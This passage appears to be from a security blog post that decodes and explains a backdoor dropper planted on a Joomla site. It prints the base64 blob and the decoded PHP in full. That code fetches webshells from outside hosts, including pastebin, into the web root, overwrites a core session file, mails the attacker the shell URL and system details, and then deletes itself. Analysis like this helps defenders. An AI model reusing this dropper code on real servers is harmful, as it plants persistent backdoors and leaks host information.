fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2Nzcy5waHAiIDsNCiR0ZXh0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qb29tbGEudHh0Jyk7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qbWFpbHoudHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL0guaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnJyk7DQokb3AzPWZvcGVuKCRjaGVjazMsICd3Jyk7DQpmd3JpdGUoJG9wMywkdGV4dDMpOw0KZmNsb3NlKCRvcDMpOw0KDQokY2hlY2s0PSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2NoZWNrLnBocCIgOw0KJHRleHQ0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9xcS50eHQnKTsNCiRvcDQ9Zm9wZW4oJGNoZWNrNCwgJ3cnKTsNCmZ3cml0ZSgkb3A0LCR0ZXh0NCk7DQpmY2xvc2UoJG9wNCk7DQoNCiRjaGVjazU9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvL21lZGlhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vbXJ0Zy51aS5waGlubWEuZWR1LnBoL2NvbXBvbmVudHMvcXF6LnR4dCcpOw0KJG9wNT1mb3BlbigkY2hlY2s1LCAndycpOw0KZndyaXRlKCRvcDUsJHRleHQ1KTsNCmZjbG9zZSgkb3A1KTsNCg0KJGNoZWNrNj0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL3Nlc3Npb24vc2Vzc2lvbi5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9VSEFHVDg4NycpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICIiOw0KJHN1YmplY3QgPSAnSm9tIHp6eiAnIC4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107DQokaGVhZGVyID0gJ2Zyb206IEtla2thaSBTZW5zZW4gPHZvblJlaW5oZXJ6S2xhdXNAU2Fpa291bmFIaWJpLmNvbT4nIC4gIlxyXG4iOw0KJG1lc3NhZ2UgPSAiU2hlbGx6IDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qbWFpbC5waHA/dSIgLiAiXHJcbiIgLiBwaHBfdW5hbWUoKSAuICJcclxuIjsNCiRzZW50bWFpbCA9IEBtYWlsKCR0b3osICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KDQoNCj8+'));
fclose($fp);


Above you see they are opening a new file in your web root folder called xxxx.php and writing something to it. What you may ask? Let's do a base64 decode again on whatever it is. Ah interesting, we get some PHP code below

<?php
function http_get($url){
  $im = curl_init($url);
  curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($im, CURLOPT_HEADER, 0);
  return curl_exec($im);
  curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
  echo $check."
";
}else
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
  echo $check2."
";
}else
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
$text3 = http_get('');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen ' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);

?>


Now the attacker can access the file on your site www.mysite.com/media/xxxx.php. As soon as he does, the php code above creates another file called css.php which is based off the contents of this malicious url hxxp://mrtg.ui.phinma.edu.ph/components/joomla.txt . Actually it does this over and over creating a bunch of backdoors or webshells so that even if the good guy finds and removes 1 or 2 of these files, the attacker will still have a way back onto your compromised machine. Finally at the end an email is sent to indicate the code ran succesfully.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.